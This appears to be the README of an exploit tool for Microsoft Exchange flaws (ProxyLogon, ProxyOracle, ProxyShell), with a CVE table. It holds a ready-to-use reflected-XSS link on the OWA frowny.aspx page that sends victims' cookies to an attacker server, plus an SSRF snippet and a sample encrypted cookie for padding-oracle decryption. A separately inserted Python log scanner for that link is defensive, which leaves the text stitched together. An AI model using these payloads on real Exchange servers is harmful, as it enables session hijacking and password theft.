proxylogon, proxyshell, proxyoracle full chain exploit tool




  1. ProxyLogon: The most well-known and impactful Exchange exploit chain
  2. ProxyOracle: The attack which could recover any password in plaintext format of Exchange users
  3. ProxyShell: The exploit chain demonstrated at Pwn2Own 2021 to take over Exchange and earn $200,000 bounty

ProxyLogon is Just the Tip of the Iceberg: A New Attack Surface on Microsoft Exchange Server! Slides Video

Most of the exploit code is rewritten in golang to speed it up... and for the purpose of learning golang :)

| Name | CVE | Patch time | Description |
|---|---|---|---|
| ProxyLogon | CVE-2021-26855 | Mar 02, 2021 | Server-side request forgery (SSRF) |
| ProxyLogon | CVE-2021-27065 | Mar 02, 2021 | Microsoft.Exchange.Management.DDIService.WriteFileActivity does not validate the extension of the file it writes, so a WebShell can be written through related functionality whose file content is partially controllable |
| ProxyOracle | CVE-2021-31196 | Jul 13, 2021 | Reflected Cross-Site Scripting |
| ProxyOracle | CVE-2021-31195 | May 11, 2021 | Padding Oracle Attack on Exchange Cookies Parsing |
| ProxyShell | CVE-2021-34473 | Apr 13, 2021 | Pre-auth Path Confusion leads to ACL Bypass |
| ProxyShell | CVE-2021-34523 | Apr 13, 2021 | Elevation of Privilege on Exchange PowerShell Backend |
| ProxyShell | CVE-2021-31207 | May 11, 2021 | Post-auth Arbitrary-File-Write leads to RCE |
| ProxyToken | CVE-2021-33766 | July 13, 2021 | With this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users. As an illustration of the impact, this can be used to copy all emails addressed to a target account and forward them to an account controlled by the attacker. |
| Microsoft Exchange Server Remote Code Execution Vulnerability | CVE-2021-42321 | Nov 17, 2021 | Exchange Deserialization RCE |



Once a victim clicks this link, the server named in it will receive the victim's cookies.

https://ews.lab/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.cookie=`[email protected]:443/path/any.php%23~1941962753`;document.cookie=`X-AnonResource=true`;fetch(`/owa/auth/`,{credentials:`include`});//

or use 3gstudent's way:


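Using the SSRF vulnerability, the Exchange server is made to send the cookie information to the XSS platform, so the cookie information that is ultimately wanted ends up in the Request Headers.

  • Modify index.js to use ajax to simulate the user's request and trigger the SSRF vulnerability

  • Modify , extracting the Request Headers of the GET request

  • Use a valid certificate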


var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", "", false);
document.cookie = "X-AnonResource=true";
document.cookie = "";
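
A defender-side check for the `frowny.aspx` link shown above, as an added example that is not part of the original repository: it scans IIS W3C logs for requests to `/owa/auth/frowny.aspx` whose `refurl` parameter carries script content, decoding repeatedly so double-encoded values are caught. The log lines, the `find_suspicious` name and the matching heuristic are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C log excerpt for illustration (not from a real server).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2021-07-20 08:01:12 GET /owa/auth/logon.aspx url=https%3a%2f%2fews.lab%2fowa%2f 10.0.0.5 200
2021-07-20 08:03:40 GET /owa/auth/frowny.aspx app=people&et=ServerError&esrc=MasterPage&te=%5C&refurl=%7D%7D%7D;document.cookie=%60X-AnonResource=true%60;// 10.0.0.9 200
2021-07-20 08:04:02 GET /owa/auth/frowny.aspx app=people&et=ServerError&refurl=%252Fowa%252F 10.0.0.7 200
2021-07-20 08:05:55 GET /OWA/auth/Frowny.aspx et=ServerError&refurl=%257D%257D%257D%253Bdocument.cookie%253D1 10.0.0.9 200
"""

# Heuristic (assumption): a legitimate refurl is a plain URL, so script
# punctuation or the cookie names used in the link above are suspicious.
SUSPICIOUS = re.compile(r"[{}`;<>]|document\.cookie|x-anonresource", re.I)

def fully_unquote(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded payloads are not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_suspicious(log_text):
    """Return (timestamp, client IP, decoded refurl) for flagged frowny.aspx hits."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if not row.get("cs-uri-stem", "").lower().endswith("/owa/auth/frowny.aspx"):
            continue
        for param in row.get("cs-uri-query", "").split("&"):
            name, _, value = param.partition("=")
            if name.lower() == "refurl" and SUSPICIOUS.search(fully_unquote(value)):
                hits.append((f"{row['date']} {row['time']}", row["c-ip"],
                             fully_unquote(value)))
    return hits

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(*hit, sep=" | ")
```
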



example cookie for decryption test:

cadata=FVtSAAWdOn29HYDQry+kG+994VUdAxONrayi4nbJW9JWTh8yLueD6IxYpahfxcGsA/B3FoVUQOD2EG605SR4QdeQ1pof+KD//6jwpmYQjv/II+OcqChrFZFvcMWv46a5; cadataTTL=eTxCEHKHDMmd/gEqDuOafg==; cadataKey=T4juhN4dUMKY4wkajUD43n4EWfMwefPQlqzxXmK4GnSHIZqo+g+uQg1Y2ogGoD1HyoVpRYgjGcCu6rmNQK+LsaZ8/lfBCThBI5yAhP1W2Fx+YNKvzy8Bcpui7zTlhAY598lE5Aijs6crHVXJeZkbLfMJgp0cFHj5uTQPcg31O/AeOAnD5c27IYOQ7JqMW7GOUVor1lhYnhh0R/NtWWqyfr5oE9j0jbxIGgrQrXIpLxL/uAU1ddC+/5jG9Edpq4sC213amuU/94rkHYzNH9OsiHYIkXr/NmkB7p908XrFrwXAcvV9QieoRiS3jvKCbzk3mnMu3YTnsJwAuiHzSXdCOQ==; cadataIV=GB9B+rwrigyPOf8xnV1KAek++yovEot9jFcV68WepCTQoRtQ5HUxSC7tE1mmHg0YtE6EOZNUM/WiNGP6xI4UTAofcMOfTLeRpBzeaKOETfjxKK2W7IKn+9k2tRkc1pIlO8FTOVx/dOHOoIFHUkqxFr+TgBULJ1I7tUmO7W0XDX4ZJHfmQhVqOOzeyjImKdX7Uv/jIJrF4VEew7rgvrC8BhqOqWgaTxpGhDTzIXl+wW3crsgZmXpXhOPURej1iwmtvhuQU6iuq4/IRv0lVIW3WvP6gUI8owIUxppnJl7YmN27Aqkjs0nTZZz1LBuZN+YxY4x6Lvs2FMG68jllhE4kwg==; cadataSig=BOJSYN2B+3RsXjO2akh3mqlKKkeAZVamOzfpVo0QdPEA3BHjpR6ls5yD9TzAQzRuWJJaaRIm7wMEiBMFz/sK5jk3R6kWw1OmMtJN2c38PdvwGIe6/7ByJdl52a5ojhDrRZhc4Qc3y+FFRx6XKvqUljTRWtHJGI1Jad2+LiNhJGkalhUeTM/a2V4LiQWf6Vv1KzJO79rZuOOOBnatht/E29j6636FpllCfEKrrogPQ7ADdVS6OOmqNU9gRMVgKnomC2t2PCtuYj26HUjnZ3rfc6BdzVmtu9EYSzccObsB2jxXXclAm5a+NZU/6sj9tlq3gcurjBl9yUDTgbZLg383gw==
  • amd64 poc binary usage:

  • just a modified version of padre, with proxyoracle detect poc code added...

  • python script exp usage:

Decrypt this cookie to plaintext:


coming soon...


coming soon...

Exchange RCE CVE-2021-42321

coming soon...

more exp coming soon......

Reference (worship to orange!)
